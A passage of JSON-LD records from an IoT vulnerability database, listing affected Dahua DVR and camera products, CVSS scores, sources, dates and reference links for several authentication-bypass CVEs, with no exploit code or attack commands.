          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201311-262",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2013-14541",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-66119",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-6117",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-14541"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66119"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-6117"
          },
          {
            "db": "BID",
            "id": "63742"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006612"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6117"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201311-262"
          }
        ]
      },
      "id": "VAR-201407-0012",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-14541"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66119"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-14541"
          }
        ]
      },
      "last_update_date": "2023-12-18T12:21:16.659000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.dahuasecurity.com/"
          },
          {
            "title": "CVE-2013-6117",
            "trust": 0.1,
            "url": "https://github.com/milo2012/cve-2013-6117 "
          },
          {
            "title": "Malware",
            "trust": 0.1,
            "url": "https://github.com/nsslabcuus/malware "
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/jerry123s/all-poc "
          },
          {
            "title": "BleepingComputer",
            "trust": 0.1,
            "url": "https://www.bleepingcomputer.com/news/security/passwords-for-tens-of-thousands-of-dahua-devices-cached-in-iot-search-engine/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2013-6117"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006612"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-287",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-66119"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006612"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6117"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.9,
            "url": "http://blog.depthsecurity.com/2013/11/dahua-dvr-authentication-bypass-cve.html"
          },
          {
            "trust": 2.6,
            "url": "http://www.osvdb.org/99783"
          },
          {
            "trust": 2.1,
            "url": "http://seclists.org/bugtraq/2013/nov/62"
          },
          {
            "trust": 1.8,
            "url": "http://www.exploit-db.com/exploits/29673"
          },
          {
            "trust": 1.8,
            "url": "http://packetstormsecurity.com/files/124022/dahua-dvr-authentication-bypass.html"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6117"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6117"
          },
          {
            "trust": 0.7,
            "url": "http://www.securityfocus.com/bid/63742"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/archive/1/529799"
          },
          {
            "trust": 0.3,
            "url": "http://www.dahuasecurity.com/products_category/dvr-2.html"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/287.html"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/milo2012/cve-2013-6117"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.exploit-db.com/exploits/29673/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-14541"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66119"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-6117"
          },
          {
            "db": "BID",
            "id": "63742"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006612"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6117"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201311-262"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-14541"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66119"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-6117"
          },
          {
            "db": "BID",
            "id": "63742"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006612"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6117"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201311-262"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2013-11-19T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2013-14541"
          },
          {
            "date": "2014-07-11T00:00:00",
            "db": "VULHUB",
            "id": "VHN-66119"
          },
          {
            "date": "2014-07-11T00:00:00",
            "db": "VULMON",
            "id": "CVE-2013-6117"
          },
          {
            "date": "2013-11-13T00:00:00",
            "db": "BID",
            "id": "63742"
          },
          {
            "date": "2014-07-15T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-006612"
          },
          {
            "date": "2014-07-11T19:55:02.673000",
            "db": "NVD",
            "id": "CVE-2013-6117"
          },
          {
            "date": "2013-11-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201311-262"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2013-11-20T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2013-14541"
          },
          {
            "date": "2014-07-14T00:00:00",
            "db": "VULHUB",
            "id": "VHN-66119"
          },
          {
            "date": "2014-07-14T00:00:00",
            "db": "VULMON",
            "id": "CVE-2013-6117"
          },
          {
            "date": "2013-11-13T00:00:00",
            "db": "BID",
            "id": "63742"
          },
          {
            "date": "2014-07-15T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-006612"
          },
          {
            "date": "2014-07-14T13:33:28.517000",
            "db": "NVD",
            "id": "CVE-2013-6117"
          },
          {
            "date": "2017-05-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201311-262"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201311-262"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua DVR Vulnerabilities that bypass authentication",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006612"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201311-262"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201702-1057

    Vulnerability from variot - Updated: 2023-12-18 12:20

    The web interface on Dahua DHI-HCVR7216A-S3 devices with NVR Firmware 3.210.0001.10 2016-06-06, Camera Firmware 2.400.0000.28.R 2016-03-29, and SmartPSS Software 1.16.1 2017-01-19 allows remote attackers to obtain login access by leveraging knowledge of the MD5 Admin Hash without knowledge of the corresponding password, a different vulnerability than CVE-2013-6117. Dahua DHI-HCVR7216A-S3 is a network hard disk recorder product of Dahua Company of China. There is a security hole in the web interface of Dahua DHI-HCVR7216A-S3 device. A remote attacker can exploit a vulnerability to submit a special request that does not authorize access to the device. Dahua Security DVR Appliances are prone to an authentication-bypass vulnerability. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201702-1057",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "smartpss",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "1.16.1"
          },
          {
            "model": "camera",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "2.400.0000.28.r"
          },
          {
            "model": "nvr",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": "3.210.0001.10"
          },
          {
            "model": "camera",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "2.400.0000.28.r 2016-03-29"
          },
          {
            "model": "nvr",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "3.210.0001.10 2016-06-06"
          },
          {
            "model": "smart pss",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "dahua",
            "version": "1.16.1 2017-01-19"
          },
          {
            "model": "security dhi-hcvr7216a-s3",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "3.210.0001.102016-06-06"
          },
          {
            "model": "security camera 2.400.0000.28.r",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "2016-03-29"
          },
          {
            "model": "security smartpss software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "dahua",
            "version": "1.16.12017-01-19"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02551"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002230"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-918"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr_firmware:3.210.0001.10:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:smartpss_firmware:1.16.1:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:camera_firmware:2.400.0000.28.r:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr7216a-s3:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-6343"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Andrew Frahn Others.",
        "sources": [
          {
            "db": "BID",
            "id": "96449"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2017-6343",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Medium",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 9.3,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2017-6343",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CNVD-2017-02551",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.6,
                "id": "VHN-114546",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 8.1,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.1,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2017-6343",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2017-6343",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-02551",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201702-918",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-114546",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02551"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114546"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002230"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-918"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The web interface on Dahua DHI-HCVR7216A-S3 devices with NVR Firmware 3.210.0001.10 2016-06-06, Camera Firmware 2.400.0000.28.R 2016-03-29, and SmartPSS Software 1.16.1 2017-01-19 allows remote attackers to obtain login access by leveraging knowledge of the MD5 Admin Hash without knowledge of the corresponding password, a different vulnerability than CVE-2013-6117. Dahua DHI-HCVR7216A-S3 is a network hard disk recorder product of Dahua Company of China. There is a security hole in the web interface of Dahua DHI-HCVR7216A-S3 device. A remote attacker can exploit a vulnerability to submit a special request that does not authorize access to the device. Dahua Security DVR Appliances are prone to an authentication-bypass vulnerability. \nAn attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-6343"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002230"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-02551"
          },
          {
            "db": "BID",
            "id": "96449"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114546"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-6343",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "96449",
            "trust": 2.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002230",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-918",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-02551",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-114546",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02551"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114546"
          },
          {
            "db": "BID",
            "id": "96449"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002230"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-918"
          }
        ]
      },
      "id": "VAR-201702-1057",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02551"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114546"
          }
        ],
        "trust": 1.60625
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02551"
          }
        ]
      },
      "last_update_date": "2023-12-18T12:20:02.310000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "HCVR7204/7208/7216A-S3",
            "trust": 0.8,
            "url": "http://www1.dahuasecurity.com/th/products/hcvr720472087216a-s3-1434.html"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002230"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-287",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-284",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-114546"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002230"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6343"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "https://nullku7.github.io/stuff/exposure/dahua/2017/02/24/dahua-nvr.html"
          },
          {
            "trust": 2.3,
            "url": "http://www.securityfocus.com/bid/96449"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6343"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6343"
          },
          {
            "trust": 0.3,
            "url": "http://www.dahuasecurity.com/products_category/dvr-2.html"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02551"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114546"
          },
          {
            "db": "BID",
            "id": "96449"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002230"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-918"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02551"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114546"
          },
          {
            "db": "BID",
            "id": "96449"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002230"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6343"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-918"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-03-09T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-02551"
          },
          {
            "date": "2017-02-27T00:00:00",
            "db": "VULHUB",
            "id": "VHN-114546"
          },
          {
            "date": "2017-02-24T00:00:00",
            "db": "BID",
            "id": "96449"
          },
          {
            "date": "2017-04-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-002230"
          },
          {
            "date": "2017-02-27T07:59:00.440000",
            "db": "NVD",
            "id": "CVE-2017-6343"
          },
          {
            "date": "2017-02-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201702-918"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-03-09T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-02551"
          },
          {
            "date": "2019-10-03T00:00:00",
            "db": "VULHUB",
            "id": "VHN-114546"
          },
          {
            "date": "2017-03-07T01:07:00",
            "db": "BID",
            "id": "96449"
          },
          {
            "date": "2017-04-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-002230"
          },
          {
            "date": "2019-10-03T00:03:26.223000",
            "db": "NVD",
            "id": "CVE-2017-6343"
          },
          {
            "date": "2019-10-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201702-918"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-918"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua DHI-HCVR7216A-S3 Vulnerability to gain login access on devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002230"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-918"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-1874

    Vulnerability from variot - Updated: 2023-12-18 12:16

    The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua IPC is a series of industrial computer from Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX]

    Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)

    Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis (2021) Limited Disclosure: September 6, 2021 Full Disclosure: October 6, 2021 PoC: https://github.com/mcw0/DahuaConsole

    -=[Dahua]=- Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957 Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware

